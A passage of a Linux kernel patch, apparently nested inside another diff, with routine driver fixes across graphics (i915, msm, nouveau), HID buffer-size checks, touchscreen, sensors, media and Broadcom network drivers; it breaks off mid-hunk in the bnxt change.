+diff --git a/drivers/gpu/drm/i915/display/intel_panel.h b/drivers/gpu/drm/i915/display/intel_panel.h
+index 5c5b5b7f95b6c..4b51e1c51da62 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.h
++++ b/drivers/gpu/drm/i915/display/intel_panel.h
+@@ -18,6 +18,7 @@ struct intel_connector;
+ struct intel_crtc_state;
+ struct intel_encoder;
+ 
++void intel_panel_init_alloc(struct intel_connector *connector);
+ int intel_panel_init(struct intel_connector *connector);
+ void intel_panel_fini(struct intel_connector *connector);
+ enum drm_connector_status
+diff --git a/drivers/gpu/drm/i915/display/intel_sdvo.c b/drivers/gpu/drm/i915/display/intel_sdvo.c
+index 774c1dc31a521..a15e09b551708 100644
+--- a/drivers/gpu/drm/i915/display/intel_sdvo.c
++++ b/drivers/gpu/drm/i915/display/intel_sdvo.c
+@@ -2891,7 +2891,7 @@ intel_sdvo_lvds_init(struct intel_sdvo *intel_sdvo, int device)
+ 	if (!intel_sdvo_create_enhance_property(intel_sdvo, intel_sdvo_connector))
+ 		goto err;
+ 
+-	intel_bios_init_panel(i915, &intel_connector->panel, NULL, NULL);
++	intel_bios_init_panel_late(i915, &intel_connector->panel, NULL, NULL);
+ 
+ 	/*
+ 	 * Fetch modes from VBT. For SDVO prefer the VBT mode since some
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index b3f5ca280ef26..90e3e41095b34 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -1925,7 +1925,7 @@ void vlv_dsi_init(struct drm_i915_private *dev_priv)
+ 
+ 	intel_dsi->panel_power_off_time = ktime_get_boottime();
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL, NULL);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, NULL, NULL);
+ 
+ 	if (intel_connector->panel.vbt.dsi.config->dual_link)
+ 		intel_dsi->ports = BIT(PORT_A) | BIT(PORT_C);
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 3dcec7acb3840..4f0dbeebb79fb 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -151,8 +151,8 @@ static void a5xx_submit(struct msm_gpu *gpu, struct msm_gem_submit *submit)
+ 	OUT_RING(ring, 1);
+ 
+ 	/* Enable local preemption for finegrain preemption */
+-	OUT_PKT7(ring, CP_PREEMPT_ENABLE_GLOBAL, 1);
+-	OUT_RING(ring, 0x02);
++	OUT_PKT7(ring, CP_PREEMPT_ENABLE_LOCAL, 1);
++	OUT_RING(ring, 0x1);
+ 
+ 	/* Allow CP_CONTEXT_SWITCH_YIELD packets in the IB2 */
+ 	OUT_PKT7(ring, CP_YIELD_ENABLE, 1);
+@@ -808,7 +808,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 	gpu_write(gpu, REG_A5XX_RBBM_AHB_CNTL2, 0x0000003F);
+ 
+ 	/* Set the highest bank bit */
+-	if (adreno_is_a540(adreno_gpu))
++	if (adreno_is_a540(adreno_gpu) || adreno_is_a530(adreno_gpu))
+ 		regbit = 2;
+ 	else
+ 		regbit = 1;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+index 8abc9a2b114a2..e0eef47dae632 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+@@ -63,7 +63,7 @@ static struct msm_ringbuffer *get_next_ring(struct msm_gpu *gpu)
+ 		struct msm_ringbuffer *ring = gpu->rb[i];
+ 
+ 		spin_lock_irqsave(&ring->preempt_lock, flags);
+-		empty = (get_wptr(ring) == ring->memptrs->rptr);
++		empty = (get_wptr(ring) == gpu->funcs->get_rptr(gpu, ring));
+ 		spin_unlock_irqrestore(&ring->preempt_lock, flags);
+ 
+ 		if (!empty)
+@@ -208,6 +208,7 @@ void a5xx_preempt_hw_init(struct msm_gpu *gpu)
+ 		a5xx_gpu->preempt[i]->wptr = 0;
+ 		a5xx_gpu->preempt[i]->rptr = 0;
+ 		a5xx_gpu->preempt[i]->rbase = gpu->rb[i]->iova;
++		a5xx_gpu->preempt[i]->rptr_addr = shadowptr(a5xx_gpu, gpu->rb[i]);
+ 	}
+ 
+ 	/* Write a 0 to signal that we aren't switching pagetables */
+@@ -259,7 +260,6 @@ static int preempt_init_ring(struct a5xx_gpu *a5xx_gpu,
+ 	ptr->data = 0;
+ 	ptr->cntl = MSM_GPU_RB_CNTL_DEFAULT | AXXX_CP_RB_CNTL_NO_UPDATE;
+ 
+-	ptr->rptr_addr = shadowptr(a5xx_gpu, ring);
+ 	ptr->counter = counters_iova;
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index 628806423f7d2..c5c4c93b3689c 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -551,13 +551,15 @@ static int adreno_bind(struct device *dev, struct device *master, void *data)
+ 	return 0;
+ }
+ 
++static int adreno_system_suspend(struct device *dev);
+ static void adreno_unbind(struct device *dev, struct device *master,
+ 		void *data)
+ {
+ 	struct msm_drm_private *priv = dev_get_drvdata(master);
+ 	struct msm_gpu *gpu = dev_to_gpu(dev);
+ 
+-	pm_runtime_force_suspend(dev);
++	if (pm_runtime_enabled(dev))
++		WARN_ON_ONCE(adreno_system_suspend(dev));
+ 	gpu->funcs->destroy(gpu);
+ 
+ 	priv->gpu_pdev = NULL;
+@@ -609,7 +611,7 @@ static int adreno_remove(struct platform_device *pdev)
+ 
+ static void adreno_shutdown(struct platform_device *pdev)
+ {
+-	pm_runtime_force_suspend(&pdev->dev);
++	WARN_ON_ONCE(adreno_system_suspend(&pdev->dev));
+ }
+ 
+ static const struct of_device_id dt_match[] = {
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 365738f40976a..41c93a18d5cb3 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -12,11 +12,15 @@
+ #include "dpu_hw_catalog.h"
+ #include "dpu_kms.h"
+ 
+-#define VIG_MASK \
++#define VIG_BASE_MASK \
+ 	(BIT(DPU_SSPP_SRC) | BIT(DPU_SSPP_QOS) |\
+-	BIT(DPU_SSPP_CSC_10BIT) | BIT(DPU_SSPP_CDP) |\
++	BIT(DPU_SSPP_CDP) |\
+ 	BIT(DPU_SSPP_TS_PREFILL) | BIT(DPU_SSPP_EXCL_RECT))
+ 
++#define VIG_MASK \
++	(VIG_BASE_MASK | \
++	BIT(DPU_SSPP_CSC_10BIT))
++
+ #define VIG_MSM8998_MASK \
+ 	(VIG_MASK | BIT(DPU_SSPP_SCALER_QSEED3))
+ 
+@@ -29,7 +33,7 @@
+ #define VIG_SM8250_MASK \
+ 	(VIG_MASK | BIT(DPU_SSPP_QOS_8LVL) | BIT(DPU_SSPP_SCALER_QSEED3LITE))
+ 
+-#define VIG_QCM2290_MASK (VIG_MASK | BIT(DPU_SSPP_QOS_8LVL))
++#define VIG_QCM2290_MASK (VIG_BASE_MASK | BIT(DPU_SSPP_QOS_8LVL))
+ 
+ #define DMA_MSM8998_MASK \
+ 	(BIT(DPU_SSPP_SRC) | BIT(DPU_SSPP_QOS) |\
+@@ -51,7 +55,7 @@
+ 	(DMA_MSM8998_MASK | BIT(DPU_SSPP_CURSOR))
+ 
+ #define MIXER_MSM8998_MASK \
+-	(BIT(DPU_MIXER_SOURCESPLIT) | BIT(DPU_DIM_LAYER))
++	(BIT(DPU_MIXER_SOURCESPLIT))
+ 
+ #define MIXER_SDM845_MASK \
+ 	(BIT(DPU_MIXER_SOURCESPLIT) | BIT(DPU_DIM_LAYER) | BIT(DPU_MIXER_COMBINED_ALPHA))
+@@ -283,7 +287,6 @@ static const struct dpu_caps qcm2290_dpu_caps = {
+ 	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0x4,
+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2,
+-	.ubwc_version = DPU_HW_UBWC_VER_20,
+ 	.has_dim_layer = true,
+ 	.has_idle_pc = true,
+ 	.max_linewidth = 2160,
+@@ -604,19 +607,19 @@ static const struct dpu_ctl_cfg sdm845_ctl[] = {
+ static const struct dpu_ctl_cfg sc7180_ctl[] = {
+ 	{
+ 	.name = "ctl_0", .id = CTL_0,
+-	.base = 0x1000, .len = 0xE4,
++	.base = 0x1000, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 9),
+ 	},
+ 	{
+ 	.name = "ctl_1", .id = CTL_1,
+-	.base = 0x1200, .len = 0xE4,
++	.base = 0x1200, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 10),
+ 	},
+ 	{
+ 	.name = "ctl_2", .id = CTL_2,
+-	.base = 0x1400, .len = 0xE4,
++	.base = 0x1400, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 11),
+ 	},
+@@ -810,9 +813,9 @@ static const struct dpu_sspp_cfg msm8998_sspp[] = {
+ 	SSPP_BLK("sspp_9", SSPP_DMA1, 0x26000,  DMA_MSM8998_MASK,
+ 		sdm845_dma_sblk_1, 5, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA1),
+ 	SSPP_BLK("sspp_10", SSPP_DMA2, 0x28000,  DMA_CURSOR_MSM8998_MASK,
+-		sdm845_dma_sblk_2, 9, SSPP_TYPE_DMA, DPU_CLK_CTRL_CURSOR0),
++		sdm845_dma_sblk_2, 9, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA2),
+ 	SSPP_BLK("sspp_11", SSPP_DMA3, 0x2a000,  DMA_CURSOR_MSM8998_MASK,
+-		sdm845_dma_sblk_3, 13, SSPP_TYPE_DMA, DPU_CLK_CTRL_CURSOR1),
++		sdm845_dma_sblk_3, 13, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA3),
+ };
+ 
+ static const struct dpu_sspp_cfg sdm845_sspp[] = {
+@@ -1918,8 +1921,6 @@ static const struct dpu_mdss_cfg qcm2290_dpu_cfg = {
+ 	.intf = qcm2290_intf,
+ 	.vbif_count = ARRAY_SIZE(sdm845_vbif),
+ 	.vbif = sdm845_vbif,
+-	.reg_dma_count = 1,
+-	.dma_cfg = &sdm845_regdma,
+ 	.perf = &qcm2290_perf_data,
+ 	.mdss_irqs = IRQ_SC7180_MASK,
+ };
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+index 7ada957adbbb8..58abf5fe97e20 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+@@ -572,6 +572,8 @@ void dpu_rm_release(struct dpu_global_state *global_state,
+ 		ARRAY_SIZE(global_state->ctl_to_enc_id), enc->base.id);
+ 	_dpu_rm_clear_mapping(global_state->dsc_to_enc_id,
+ 		ARRAY_SIZE(global_state->dsc_to_enc_id), enc->base.id);
++	_dpu_rm_clear_mapping(global_state->dspp_to_enc_id,
++		ARRAY_SIZE(global_state->dspp_to_enc_id), enc->base.id);
+ }
+ 
+ int dpu_rm_reserve(
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index 7c2cc1262c05d..d8c9d184190bb 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -627,8 +627,8 @@ static struct msm_submit_post_dep *msm_parse_post_deps(struct drm_device *dev,
+ 	int ret = 0;
+ 	uint32_t i, j;
+ 
+-	post_deps = kmalloc_array(nr_syncobjs, sizeof(*post_deps),
+-	                          GFP_KERNEL | __GFP_NOWARN | __GFP_NORETRY);
++	post_deps = kcalloc(nr_syncobjs, sizeof(*post_deps),
++			    GFP_KERNEL | __GFP_NOWARN | __GFP_NORETRY);
+ 	if (!post_deps)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -643,7 +643,6 @@ static struct msm_submit_post_dep *msm_parse_post_deps(struct drm_device *dev,
+ 		}
+ 
+ 		post_deps[i].point = syncobj_desc.point;
+-		post_deps[i].chain = NULL;
+ 
+ 		if (syncobj_desc.flags) {
+ 			ret = -EINVAL;
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/wndw.h b/drivers/gpu/drm/nouveau/dispnv50/wndw.h
+index 591c852f326b9..76a6ae5d56526 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/wndw.h
++++ b/drivers/gpu/drm/nouveau/dispnv50/wndw.h
+@@ -35,8 +35,9 @@ struct nv50_wndw {
+ 
+ int nv50_wndw_new_(const struct nv50_wndw_func *, struct drm_device *,
+ 		   enum drm_plane_type, const char *name, int index,
+-		   const u32 *format, enum nv50_disp_interlock_type,
+-		   u32 interlock_data, u32 heads, struct nv50_wndw **);
++		   const u32 *format, u32 heads,
++		   enum nv50_disp_interlock_type, u32 interlock_data,
++		   struct nv50_wndw **);
+ void nv50_wndw_flush_set(struct nv50_wndw *, u32 *interlock,
+ 			 struct nv50_wndw_atom *);
+ void nv50_wndw_flush_clr(struct nv50_wndw *, u32 *interlock, bool flush,
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index 5c72aef3d3dd5..799a3086dbb06 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -261,6 +261,7 @@ static int hid_add_field(struct hid_parser *parser, unsigned report_type, unsign
+ {
+ 	struct hid_report *report;
+ 	struct hid_field *field;
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
+ 	unsigned int usages;
+ 	unsigned int offset;
+ 	unsigned int i;
+@@ -291,8 +292,11 @@ static int hid_add_field(struct hid_parser *parser, unsigned report_type, unsign
+ 	offset = report->size;
+ 	report->size += parser->global.report_size * parser->global.report_count;
+ 
++	if (parser->device->ll_driver->max_buffer_size)
++		max_buffer_size = parser->device->ll_driver->max_buffer_size;
++
+ 	/* Total size check: Allow for possible report index byte */
+-	if (report->size > (HID_MAX_BUFFER_SIZE - 1) << 3) {
++	if (report->size > (max_buffer_size - 1) << 3) {
+ 		hid_err(parser->device, "report is too long\n");
+ 		return -1;
+ 	}
+@@ -1966,6 +1970,7 @@ int hid_report_raw_event(struct hid_device *hid, enum hid_report_type type, u8 *
+ 	struct hid_report_enum *report_enum = hid->report_enum + type;
+ 	struct hid_report *report;
+ 	struct hid_driver *hdrv;
++	int max_buffer_size = HID_MAX_BUFFER_SIZE;
+ 	u32 rsize, csize = size;
+ 	u8 *cdata = data;
+ 	int ret = 0;
+@@ -1981,10 +1986,13 @@ int hid_report_raw_event(struct hid_device *hid, enum hid_report_type type, u8 *
+ 
+ 	rsize = hid_compute_report_size(report);
+ 
+-	if (report_enum->numbered && rsize >= HID_MAX_BUFFER_SIZE)
+-		rsize = HID_MAX_BUFFER_SIZE - 1;
+-	else if (rsize > HID_MAX_BUFFER_SIZE)
+-		rsize = HID_MAX_BUFFER_SIZE;
++	if (hid->ll_driver->max_buffer_size)
++		max_buffer_size = hid->ll_driver->max_buffer_size;
++
++	if (report_enum->numbered && rsize >= max_buffer_size)
++		rsize = max_buffer_size - 1;
++	else if (rsize > max_buffer_size)
++		rsize = max_buffer_size;
+ 
+ 	if (csize < rsize) {
+ 		dbg_hid("report %d is too short, (%d < %d)\n", report->id,
+@@ -2387,7 +2395,12 @@ int hid_hw_raw_request(struct hid_device *hdev,
+ 		       unsigned char reportnum, __u8 *buf,
+ 		       size_t len, enum hid_report_type rtype, enum hid_class_request reqtype)
+ {
+-	if (len < 1 || len > HID_MAX_BUFFER_SIZE || !buf)
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
++
++	if (hdev->ll_driver->max_buffer_size)
++		max_buffer_size = hdev->ll_driver->max_buffer_size;
++
++	if (len < 1 || len > max_buffer_size || !buf)
+ 		return -EINVAL;
+ 
+ 	return hdev->ll_driver->raw_request(hdev, reportnum, buf, len,
+@@ -2406,7 +2419,12 @@ EXPORT_SYMBOL_GPL(hid_hw_raw_request);
+  */
+ int hid_hw_output_report(struct hid_device *hdev, __u8 *buf, size_t len)
+ {
+-	if (len < 1 || len > HID_MAX_BUFFER_SIZE || !buf)
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
++
++	if (hdev->ll_driver->max_buffer_size)
++		max_buffer_size = hdev->ll_driver->max_buffer_size;
++
++	if (len < 1 || len > max_buffer_size || !buf)
+ 		return -EINVAL;
+ 
+ 	if (hdev->ll_driver->output_report)
+diff --git a/drivers/hid/uhid.c b/drivers/hid/uhid.c
+index 2a918aeb0af13..59ac757c1d471 100644
+--- a/drivers/hid/uhid.c
++++ b/drivers/hid/uhid.c
+@@ -395,6 +395,7 @@ struct hid_ll_driver uhid_hid_driver = {
+ 	.parse = uhid_hid_parse,
+ 	.raw_request = uhid_hid_raw_request,
+ 	.output_report = uhid_hid_output_report,
++	.max_buffer_size = UHID_DATA_MAX,
+ };
+ EXPORT_SYMBOL_GPL(uhid_hid_driver);
+ 
+diff --git a/drivers/input/touchscreen/exc3000.c b/drivers/input/touchscreen/exc3000.c
+index 4b7eee01c6aad..615646a03039b 100644
+--- a/drivers/input/touchscreen/exc3000.c
++++ b/drivers/input/touchscreen/exc3000.c
+@@ -109,6 +109,11 @@ static inline void exc3000_schedule_timer(struct exc3000_data *data)
+ 	mod_timer(&data->timer, jiffies + msecs_to_jiffies(EXC3000_TIMEOUT_MS));
+ }
+ 
++static void exc3000_shutdown_timer(void *timer)
++{
++	del_timer_sync(timer);
++}
++
+ static int exc3000_read_frame(struct exc3000_data *data, u8 *buf)
+ {
+ 	struct i2c_client *client = data->client;
+@@ -386,6 +391,11 @@ static int exc3000_probe(struct i2c_client *client)
+ 	if (error)
+ 		return error;
+ 
++	error = devm_add_action_or_reset(&client->dev, exc3000_shutdown_timer,
++					 &data->timer);
++	if (error)
++		return error;
++
+ 	error = devm_request_threaded_irq(&client->dev, client->irq,
+ 					  NULL, exc3000_interrupt, IRQF_ONESHOT,
+ 					  client->name, data);
+diff --git a/drivers/macintosh/windfarm_lm75_sensor.c b/drivers/macintosh/windfarm_lm75_sensor.c
+index 204661c8e918f..9dd80837a759a 100644
+--- a/drivers/macintosh/windfarm_lm75_sensor.c
++++ b/drivers/macintosh/windfarm_lm75_sensor.c
+@@ -33,8 +33,8 @@
+ #endif
+ 
+ struct wf_lm75_sensor {
+-	int			ds1775 : 1;
+-	int			inited : 1;
++	unsigned int		ds1775 : 1;
++	unsigned int		inited : 1;
+ 	struct i2c_client	*i2c;
+ 	struct wf_sensor	sens;
+ };
+diff --git a/drivers/macintosh/windfarm_smu_sensors.c b/drivers/macintosh/windfarm_smu_sensors.c
+index 00c6fe25fcba0..2bdb73b34d291 100644
+--- a/drivers/macintosh/windfarm_smu_sensors.c
++++ b/drivers/macintosh/windfarm_smu_sensors.c
+@@ -274,8 +274,8 @@ struct smu_cpu_power_sensor {
+ 	struct list_head	link;
+ 	struct wf_sensor	*volts;
+ 	struct wf_sensor	*amps;
+-	int			fake_volts : 1;
+-	int			quadratic : 1;
++	unsigned int		fake_volts : 1;
++	unsigned int		quadratic : 1;
+ 	struct wf_sensor	sens;
+ };
+ #define to_smu_cpu_power(c) container_of(c, struct smu_cpu_power_sensor, sens)
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 873087e180561..267f514023e72 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -3482,7 +3482,7 @@ static int ov5640_init_controls(struct ov5640_dev *sensor)
+ 	/* Auto/manual gain */
+ 	ctrls->auto_gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_AUTOGAIN,
+ 					     0, 1, 1, 1);
+-	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_GAIN,
++	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_ANALOGUE_GAIN,
+ 					0, 1023, 1, 0);
+ 
+ 	ctrls->saturation = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_SATURATION,
+diff --git a/drivers/media/rc/gpio-ir-recv.c b/drivers/media/rc/gpio-ir-recv.c
+index 22e524b69806a..a56c844d7f816 100644
+--- a/drivers/media/rc/gpio-ir-recv.c
++++ b/drivers/media/rc/gpio-ir-recv.c
+@@ -130,6 +130,23 @@ static int gpio_ir_recv_probe(struct platform_device *pdev)
+ 				"gpio-ir-recv-irq", gpio_dev);
+ }
+ 
++static int gpio_ir_recv_remove(struct platform_device *pdev)
++{
++	struct gpio_rc_dev *gpio_dev = platform_get_drvdata(pdev);
++	struct device *pmdev = gpio_dev->pmdev;
++
++	if (pmdev) {
++		pm_runtime_get_sync(pmdev);
++		cpu_latency_qos_remove_request(&gpio_dev->qos);
++
++		pm_runtime_disable(pmdev);
++		pm_runtime_put_noidle(pmdev);
++		pm_runtime_set_suspended(pmdev);
++	}
++
++	return 0;
++}
++
+ #ifdef CONFIG_PM
+ static int gpio_ir_recv_suspend(struct device *dev)
+ {
+@@ -189,6 +206,7 @@ MODULE_DEVICE_TABLE(of, gpio_ir_recv_of_match);
+ 
+ static struct platform_driver gpio_ir_recv_driver = {
+ 	.probe  = gpio_ir_recv_probe,
++	.remove = gpio_ir_recv_remove,
+ 	.driver = {
+ 		.name   = KBUILD_MODNAME,
+ 		.of_match_table = of_match_ptr(gpio_ir_recv_of_match),
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index a884f6f6a8c2c..1e0b8bcd59e6c 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -393,6 +393,24 @@ mt7530_fdb_write(struct mt7530_priv *priv, u16 vid,
+ 		mt7530_write(priv, MT7530_ATA1 + (i * 4), reg[i]);
+ }
+ 
++/* Set up switch core clock for MT7530 */
++static void mt7530_pll_setup(struct mt7530_priv *priv)
++{
++	/* Disable PLL */
++	core_write(priv, CORE_GSWPLL_GRP1, 0);
++
++	/* Set core clock into 500Mhz */
++	core_write(priv, CORE_GSWPLL_GRP2,
++		   RG_GSWPLL_POSDIV_500M(1) |
++		   RG_GSWPLL_FBKDIV_500M(25));
++
++	/* Enable PLL */
++	core_write(priv, CORE_GSWPLL_GRP1,
++		   RG_GSWPLL_EN_PRE |
++		   RG_GSWPLL_POSDIV_200M(2) |
++		   RG_GSWPLL_FBKDIV_200M(32));
++}
++
+ /* Setup TX circuit including relevant PAD and driving */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+@@ -453,21 +471,6 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+ 		   REG_GSWCK_EN | REG_TRGMIICK_EN);
+ 
+-	/* Setup core clock for MT7530 */
+-	/* Disable PLL */
+-	core_write(priv, CORE_GSWPLL_GRP1, 0);
+-
+-	/* Set core clock into 500Mhz */
+-	core_write(priv, CORE_GSWPLL_GRP2,
+-		   RG_GSWPLL_POSDIV_500M(1) |
+-		   RG_GSWPLL_FBKDIV_500M(25));
+-
+-	/* Enable PLL */
+-	core_write(priv, CORE_GSWPLL_GRP1,
+-		   RG_GSWPLL_EN_PRE |
+-		   RG_GSWPLL_POSDIV_200M(2) |
+-		   RG_GSWPLL_FBKDIV_200M(32));
+-
+ 	/* Setup the MT7530 TRGMII Tx Clock */
+ 	core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+ 	core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
+@@ -2201,6 +2204,8 @@ mt7530_setup(struct dsa_switch *ds)
+ 		     SYS_CTRL_PHY_RST | SYS_CTRL_SW_RST |
+ 		     SYS_CTRL_REG_RST);
+ 
++	mt7530_pll_setup(priv);
++
+ 	/* Enable Port 6 only; P5 as GMAC5 which currently is not supported */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+diff --git a/drivers/net/ethernet/broadcom/bgmac.c b/drivers/net/ethernet/broadcom/bgmac.c
+index 3038386a5afd8..1761df8fb7f96 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.c
++++ b/drivers/net/ethernet/broadcom/bgmac.c
+@@ -890,13 +890,13 @@ static void bgmac_chip_reset_idm_config(struct bgmac *bgmac)
+ 
+ 		if (iost & BGMAC_BCMA_IOST_ATTACHED) {
+ 			flags = BGMAC_BCMA_IOCTL_SW_CLKEN;
+-			if (!bgmac->has_robosw)
++			if (bgmac->in_init || !bgmac->has_robosw)
+ 				flags |= BGMAC_BCMA_IOCTL_SW_RESET;
+ 		}
+ 		bgmac_clk_enable(bgmac, flags);
+ 	}
+ 
+-	if (iost & BGMAC_BCMA_IOST_ATTACHED && !bgmac->has_robosw)
++	if (iost & BGMAC_BCMA_IOST_ATTACHED && (bgmac->in_init || !bgmac->has_robosw))
+ 		bgmac_idm_write(bgmac, BCMA_IOCTL,
+ 				bgmac_idm_read(bgmac, BCMA_IOCTL) &
+ 				~BGMAC_BCMA_IOCTL_SW_RESET);
+@@ -1490,6 +1490,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	struct net_device *net_dev = bgmac->net_dev;
+ 	int err;
+ 
++	bgmac->in_init = true;
++
+ 	bgmac_chip_intrs_off(bgmac);
+ 
+ 	net_dev->irq = bgmac->irq;
+@@ -1542,6 +1544,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	/* Omit FCS from max MTU size */
+ 	net_dev->max_mtu = BGMAC_RX_MAX_FRAME_SIZE - ETH_FCS_LEN;
+ 
++	bgmac->in_init = false;
++
+ 	err = register_netdev(bgmac->net_dev);
+ 	if (err) {
+ 		dev_err(bgmac->dev, "Cannot register net device\n");
+diff --git a/drivers/net/ethernet/broadcom/bgmac.h b/drivers/net/ethernet/broadcom/bgmac.h
+index e05ac92c06504..d73ef262991d6 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.h
++++ b/drivers/net/ethernet/broadcom/bgmac.h
+@@ -472,6 +472,8 @@ struct bgmac {
+ 	int irq;
+ 	u32 int_mask;
+ 
++	bool in_init;
++
+ 	/* Current MAC state */
+ 	int mac_speed;
+ 	int mac_duplex;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index cecda545372f9..251b102d2792b 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -3143,7 +3143,7 @@ static int bnxt_alloc_ring(struct bnxt *bp, struct bnxt_ring_mem_info *rmem)
+ 
+ static void bnxt_free_tpa_info(struct bnxt *bp)
+ {
+-	int i;
++	int i, j;
+ 
+ 	for (i = 0; i < bp->rx_nr_rings; i++) {
+ 		struct bnxt_rx_ring_info *rxr = &bp->rx_ring[i];
+@@ -3151,8 +3151,10 @@ static void bnxt_free_tpa_info(struct bnxt *bp)
+ 		kfree(rxr->rx_tpa_idx_map);
+ 		rxr->rx_tpa_idx_map = NULL;
+ 		if (rxr->rx_tpa) {
+-			kfree(rxr->rx_tpa[0].agg_arr);
+-			rxr->rx_tpa[0].agg_arr = NULL;
++			for (j = 0; j < bp->max_tpa; j++) {
++				kfree(rxr->rx_tpa[j].agg_arr);
++				rxr->rx_tpa[j].agg_arr = NULL;
++			}
+ 		}
+ 		kfree(rxr->rx_tpa);
+ 		rxr->rx_tpa = NULL;
+@@ -3161,14 +3163,13 @@ static void bnxt_free_tpa_info(struct bnxt *bp)
+ 
+ static int bnxt_alloc_tpa_info(struct bnxt *bp)
+ {
+-	int i, j, total_aggs = 0;
++	int i, j;
+ 
+ 	bp->max_tpa = MAX_TPA;
+ 	if (bp->flags & BNXT_FLAG_CHIP_P5) {
+ 		if (!bp->max_tpa_v2)
+ 			return 0;
+ 		bp->max_tpa = max_t(u16, bp->max_tpa_v2, MAX_TPA_P5);
+-		total_aggs = bp->max_tpa * MAX_SKB_FRAGS;
+ 	}
+ 
+ 	for (i = 0; i < bp->rx_nr_rings; i++) {
+@@ -3182,12 +3183,12 @@ static int bnxt_alloc_tpa_info(struct bnxt *bp)
+ 
+ 		if (!(bp->flags & BNXT_FLAG_CHIP_P5))
+ 			continue;
+-		agg = kcalloc(total_aggs, sizeof(*agg), GFP_KERNEL);
+-		rxr->rx_tpa[0].agg_arr = agg;
+-		if (!agg)
+-			return -ENOMEM;
+-		for (j = 1; j < bp->max_tpa; j++)
+-			rxr->rx_tpa[j].agg_arr = agg + j * MAX_SKB_FRAGS;
++		for (j = 0; j < bp->max_tpa; j++) {
